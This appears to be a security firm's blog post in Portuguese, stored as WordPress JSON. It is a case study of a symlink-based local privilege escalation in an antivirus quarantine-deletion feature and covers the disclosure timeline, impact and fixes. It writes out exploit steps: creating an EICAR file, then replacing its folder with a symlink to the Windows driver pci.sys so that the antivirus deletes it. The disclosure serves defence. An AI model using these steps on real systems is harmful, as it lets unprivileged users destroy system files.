{"id":156,"date":"2025-02-10T18:14:34","date_gmt":"2025-02-10T18:14:34","guid":{"rendered":"https:\/\/fikresekhel.com\/blog\/?p=156"},"modified":"2025-02-10T18:14:35","modified_gmt":"2025-02-10T18:14:35","slug":"caso-de-estudo-escalacao-de-privilegio-local-ao-excluir-arquivos-da-quarentena","status":"publish","type":"post","link":"https:\/\/fikresekhel.com\/blog\/nossos-cases\/caso-de-estudo-escalacao-de-privilegio-local-ao-excluir-arquivos-da-quarentena\/","title":{"rendered":"Caso de Estudo: Escala\u00e7\u00e3o de Privil\u00e9gio Local ao Excluir Arquivos da Quarentena"},"content":{"rendered":"\n

Resumo do Caso<\/h2>\n\n\n\n

Durante uma auditoria de seguran\u00e7a realizada por FikreSekhel<\/strong>, foi identificada uma vulnerabilidade de escala\u00e7\u00e3o de privil\u00e9gio local (LPE – Local Privilege Escalation)<\/strong> em um sistema de antiv\u00edrus<\/strong> utilizado por um e-commerce<\/strong>. A falha ocorre no processo de exclus\u00e3o de arquivos em quarentena<\/strong>, permitindo que um usu\u00e1rio sem privil\u00e9gios administrativos exclua arquivos cr\u00edticos do sistema<\/strong> atrav\u00e9s de um ataque de symlink (atalho simb\u00f3lico)<\/strong>.<\/p>\n\n\n\n

Essa vulnerabilidade foi classificada como M\u00e9dia<\/strong> e resolvida ap\u00f3s a implementa\u00e7\u00e3o de verifica\u00e7\u00f5es adicionais na exclus\u00e3o de arquivos.<\/p>\n\n\n\n

\n\n\n\n

Linha do Tempo do Incidente<\/strong><\/h2>\n\n\n\n
Data<\/th>Hor\u00e1rio (UTC)<\/th>A\u00e7\u00e3o<\/th><\/tr>
16\/09\/2020<\/td>11:27<\/td>Vulnerabilidade reportada<\/td><\/tr>
17\/09\/2020<\/td>15:10<\/td>Status alterado para “Triaged” ap\u00f3s valida\u00e7\u00e3o da falha<\/td><\/tr>
06\/10\/2020<\/td>09:20<\/td>Recompensa concedida ao pesquisador<\/td><\/tr>
10\/02\/2021<\/td>23:04<\/td>Vulnerabilidade resolvida e status do relat\u00f3rio fechado<\/td><\/tr>
26\/08\/2024<\/td>15:31<\/td>Relat\u00f3rio tornado p\u00fablico<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
\n\n\n\n

Detalhes da Vulnerabilidade<\/strong><\/h2>\n\n\n\n

O sistema de antiv\u00edrus, ao mover um arquivo para quarentena<\/strong>, n\u00e3o o exclui completamente do local original. Em vez disso, esvazia seu conte\u00fado, oculta o arquivo e permite sua exclus\u00e3o manual posteriormente<\/strong>. Esse processo \u00e9 vulner\u00e1vel a ataques de symlink<\/strong>, permitindo que um usu\u00e1rio de baixo privil\u00e9gio engane o sistema para excluir qualquer arquivo cr\u00edtico do sistema operacional<\/strong>.<\/p>\n\n\n\n

Exemplo de C\u00f3digo Explor\u00e1vel<\/strong><\/h3>\n\n\n\n

1. Criando um Arquivo Detectado como Malicioso<\/strong><\/h4>\n\n\n\n
mkdir %userprofile%\\Desktop\\malicioso\n\necho|set \/p=\"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*\" > %userprofile%\\Desktop\\malicioso\\teste.exe<\/code><\/pre>\n\n\n\n
Esse c\u00f3digo cria um arquivo EICAR<\/strong>, que ser\u00e1 detectado e colocado em quarentena<\/strong> pelo antiv\u00edrus.<\/p>\n\n\n\n
\n\n\n\n
2. Criando o Ataque de Symlink<\/strong><\/h4>\n\n\n\n
Ap\u00f3s o arquivo ser movido para quarentena, deletamos seu diret\u00f3rio e criamos um symlink apontando para um arquivo cr\u00edtico do sistema<\/strong>:<\/p>\n\n\n\n
rmdir \/S \/Q %userprofile%\\Desktop\\malicioso\n\nCreateSymlink.exe %userprofile%\\Desktop\\malicioso\\teste.exe C:\\Windows\\System32\\drivers\\pci.sys<\/code><\/pre>\n\n\n\n
Agora, o antiv\u00edrus tentar\u00e1 excluir o arquivo pci.sys<\/strong> (driver do Windows), comprometendo o sistema.<\/p>\n\n\n\n
\n\n\n\n
3. Ativando a Exclus\u00e3o de Arquivos da Quarentena<\/strong><\/h4>\n\n\n\n
1. Abrir a interface do antiv\u00edrus.\n2. Acessar a se\u00e7\u00e3o de Quarentena.\n3. Selecionar o arquivo e clicar em \"Excluir do PC\".<\/code><\/pre>\n\n\n\n
O antiv\u00edrus tentar\u00e1 excluir o arquivo original, mas como ele agora \u00e9 um symlink para pci.sys<\/strong>, o arquivo cr\u00edtico ser\u00e1 removido.<\/p>\n\n\n\n
\ud83d\udd34 Problema:<\/strong> O antiv\u00edrus executa a exclus\u00e3o sem verificar se o arquivo original foi alterado.<\/p>\n\n\n\n
\u26a0\ufe0f Impacto:<\/strong> Usu\u00e1rios sem privil\u00e9gios administrativos podem excluir arquivos cr\u00edticos do sistema operacional.<\/strong><\/p>\n\n\n\n
\n\n\n\n
\ud83d\ude80 Impacto da Vulnerabilidade<\/strong><\/h2>\n\n\n\n
\ud83d\udd34 Escala\u00e7\u00e3o de Privil\u00e9gio Local (LPE)<\/strong>: Usu\u00e1rios comuns podem deletar arquivos protegidos pelo sistema operacional.<\/p>\n\n\n\n
\ud83d\udd34 Comprometimento do Sistema<\/strong>: A remo\u00e7\u00e3o de arquivos cr\u00edticos pode tornar o sistema inutiliz\u00e1vel<\/strong>, causando falhas e telas azuis<\/strong>.<\/p>\n\n\n\n
\ud83d\udd34 Potencial para Ataques Maiores<\/strong>: A t\u00e9cnica pode ser combinada com outros vetores para obten\u00e7\u00e3o de privil\u00e9gios administrativos<\/strong>.<\/p>\n\n\n\n
\n\n\n\n
Resolu\u00e7\u00e3o e Medidas Preventivas<\/strong><\/h2>\n\n\n\n
\u2705 Impedir a exclus\u00e3o de arquivos via symlink<\/strong><\/p>\n\n\n\n
\u2705 Verificar a identidade do usu\u00e1rio antes de deletar arquivos protegidos<\/strong><\/p>\n\n\n\n
\u2705 Executar opera\u00e7\u00f5es de exclus\u00e3o com permiss\u00f5es do usu\u00e1rio e n\u00e3o do sistema<\/strong><\/p>\n\n\n\n
\u2705 Registrar logs detalhados para detectar tentativas de explora\u00e7\u00e3o<\/strong><\/p>\n\n\n\n
\u2705 Treinamento da equipe de seguran\u00e7a para reconhecer vetores de ataque semelhantes<\/strong><\/p>\n\n\n\n
\n\n\n\n
Conclus\u00e3o<\/strong><\/h2>\n\n\n\n
Este caso refor\u00e7a a necessidade de valida\u00e7\u00f5es rigorosas em opera\u00e7\u00f5es cr\u00edticas<\/strong>, especialmente quando envolvem exclus\u00e3o de arquivos do sistema<\/strong>. Implementar prote\u00e7\u00f5es contra ataques de symlink<\/strong> e validar permiss\u00f5es adequadamente s\u00e3o essenciais para evitar explora\u00e7\u00e3o de escala\u00e7\u00e3o de privil\u00e9gio local (LPE)<\/strong>.<\/p>\n\n\n\n
\ud83d\udd0e Sua aplica\u00e7\u00e3o est\u00e1 protegida contra ataques de symlink?<\/strong> Testes regulares podem evitar comprometimento do sistema e ataques de escalonamento de privil\u00e9gios<\/strong>.<\/p>\n\n\n\n
\ud83d\udca1 Entre em contato com nossos especialistas e agende uma auditoria de seguran\u00e7a!<\/strong><\/p>\n\n\n\n
\ud83d\udcf2\u00a0Clique aqui e converse com um especialista no WhatsApp!<\/a><\/strong><\/p>\n","protected":false},"excerpt":{"rendered":"
Resumo do Caso Durante uma auditoria de seguran\u00e7a […]<\/p>\n","protected":false},"author":1,"featured_media":157,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[24],"tags":[],"class_list":["post-156","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-nossos-cases"],"_links":{"self":[{"href":"https:\/\/fikresekhel.com\/blog\/wp-json\/wp\/v2\/posts\/156","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fikresekhel.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fikresekhel.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fikresekhel.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fikresekhel.com\/blog\/wp-json\/wp\/v2\/comments?post=156"}],"version-history":[{"count":1,"href":"https:\/\/fikresekhel.com\/blog\/wp-json\/wp\/v2\/posts\/156\/revisions"}],"predecessor-version":[{"id":158,"href":"https:\/\/fikresekhel.com\/blog\/wp-json\/wp\/v2\/posts\/156\/revisions\/158"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fikresekhel.com\/blog\/wp-json\/wp\/v2\/media\/157"}],"wp:attachment":[{"href":"https:\/\/fikresekhel.com\/blog\/wp-json\/wp\/v2\/media?parent=156"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fikresekhel.com\/blog\/wp-json\/wp\/v2\/categories?post=156"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fikresekhel.com\/blog\/wp-json\/wp\/v2\/tags?post=156"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}